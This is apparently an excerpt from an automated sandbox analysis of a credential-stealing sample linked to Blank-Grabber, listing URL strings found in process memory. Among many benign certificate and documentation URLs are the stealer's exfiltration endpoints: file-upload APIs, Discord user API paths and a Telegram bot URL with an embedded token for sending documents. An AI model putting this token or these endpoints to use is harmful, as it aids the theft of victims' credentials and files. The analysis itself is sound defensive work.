_decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC52C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, word.exe.15.dr	String found in binary or memory: https://api.telegram.org/bot
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: sB2ClgrGng.exe, 00000001.00000003.1769395592.00000281AB9CC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1768908120.00000281AB9BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: sB2ClgrGng.exe, 00000001.00000003.1767726197.00000281AB66C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1767703223.00000281AB92A000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000020.00000003.1849613191.000002224F0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
Source: sB2ClgrGng.exe, 00000001.00000003.1781689076.00000281ABAAD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1780927309.00000281AC123000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781524596.00000281ABAAB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781240477.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1783520888.00000281ABEF8000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000033.00000002.1942613111.000001F226052000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB5E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784568761.00000281AB95E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC538000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC51C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
